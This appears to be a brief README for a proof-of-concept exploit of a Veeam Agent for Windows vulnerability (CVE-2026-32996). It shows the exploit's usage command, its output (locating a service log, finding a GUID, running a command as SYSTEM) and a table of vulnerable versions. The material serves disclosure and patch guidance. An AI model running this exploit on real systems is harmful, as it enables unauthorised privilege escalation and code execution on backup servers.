
A vulnerability in Veeam Agent for Microsoft Windows allows for Local Privilege Escalation.
Veeam Remote Code Execution (RCE) on the Backup Server by an authenticated domain user.
Check blog post post for technical details.
https://github.com/user-attachments/assets/8a570332-1cf6-4905-9107-8fcb973c9ce7
CVE-2026-32996.exe "whoami > C:\pwned.txt"
[+] Found Svc.VeeamEndpointBackup.log
[*] Searching for valid GUIDs...
[+] Valid GUID found: 9048554a-ec99-4e18-8bc4-edc637e8d8d4
[*] Executing command 'cmd /c whoami > C:\pwned.txt'
[+] Successful!
| Version | Status |
|---|---|
| 13.0.3.1220 | Fully patched. |
| 13.0.2.1102 and earlier | Vulnerable. |